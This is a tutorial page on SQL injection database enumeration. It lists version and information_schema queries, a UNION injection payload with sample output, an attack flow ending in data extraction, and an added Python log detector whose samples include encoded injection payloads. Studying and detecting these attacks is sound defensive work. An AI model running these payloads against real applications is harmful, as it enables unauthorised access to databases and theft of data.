
SQL Injection Database Enumeration

A successful SQL injection attack depends on understanding the database structure and the data it contains. This section covers the SQL queries used to enumerate both.

Version Detection

Database Version Queries

-- Microsoft SQL Server, MySQL
SELECT @@version
-- Oracle
SELECT * FROM v$version
-- PostgreSQL
SELECT version()

Example Attack

' UNION SELECT @@version--

Sample Output

Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10

Database Structure Enumeration

Listing Tables

SELECT * FROM information_schema.tables

Sample Output

TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  TABLE_TYPE
===================================================
MyDatabase     dbo           Products    BASE TABLE
MyDatabase     dbo           Users       BASE TABLE
MyDatabase     dbo           Feedback    BASE TABLE

Listing Columns

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Sample Output

TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  COLUMN_NAME  DATA_TYPE
===============================================================
MyDatabase     dbo           Users       UserId       int
MyDatabase     dbo           Users       Username     varchar
MyDatabase     dbo           Users       Password     varchar

Key Notes

  • The information schema is available in most databases (except Oracle).
  • Use version detection to tailor further attacks.
  • Schema enumeration is crucial for data extraction.

Common Attack Flow

  1. Identify database type/version
  2. Query information schema
  3. Map database structure
  4. Target sensitive tables/columns
  5. Extract data using discovered information
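
Detecting this flow in request logs (an added example, not part of the original page): the script below URL-decodes each request, looks for the version and information-schema markers from the queries above, and groups the stages seen per client. The log format, the request paths, the IP addresses and all function names are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Markers taken from the queries on this page, keyed by attack-flow stage.
STAGE_PATTERNS = {
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)|\bv\$version\b", re.I),
    "table_listing": re.compile(r"\binformation_schema\s*\.\s*tables\b", re.I),
    "column_listing": re.compile(r"\binformation_schema\s*\.\s*columns\b", re.I),
}

def normalize(raw: str) -> str:
    """URL-decode until stable (at most 3 rounds) and collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return re.sub(r"\s+", " ", raw)

def classify(request: str) -> set:
    """Return the enumeration stages whose markers appear in one request."""
    text = normalize(request)
    return {stage for stage, rx in STAGE_PATTERNS.items() if rx.search(text)}

def enumeration_by_client(log_lines):
    """Map client IP -> set of enumeration stages seen in its requests."""
    seen = defaultdict(set)
    for line in log_lines:
        ip, _, request = line.partition(" ")
        stages = classify(request)
        if stages:
            seen[ip] |= stages
    return dict(seen)

def high_priority(seen):
    """Clients that both probed the version and queried the schema."""
    schema = {"table_listing", "column_listing"}
    return sorted(ip for ip, s in seen.items() if "version_probe" in s and s & schema)

# Constructed sample log lines ("<client-ip> <request>"), not real traffic.
SAMPLE_LOG = [
    "203.0.113.7 GET /products?category=Gifts%27+UNION+SELECT+%40%40version--",
    "203.0.113.7 GET /products?category=Gifts%27+UNION+SELECT+*+FROM+information_schema.tables--",
    "203.0.113.7 GET /products?category=Gifts%27+UNION+SELECT+*+FROM+information_schema.columns+WHERE+table_name+%3D+%27Users%27--",
    "198.51.100.4 GET /products?category=Gifts",
    "198.51.100.9 GET /docs/search?q=postgres+version%28%29+function",
]

if __name__ == "__main__":
    seen = enumeration_by_client(SAMPLE_LOG)
    for ip in sorted(seen):
        print(ip, sorted(seen[ip]))
    print("escalate:", high_priority(seen))
```

A single version marker, as in the documentation search from 198.51.100.9, is recorded but not escalated; only a client that combines a version probe with a schema query is.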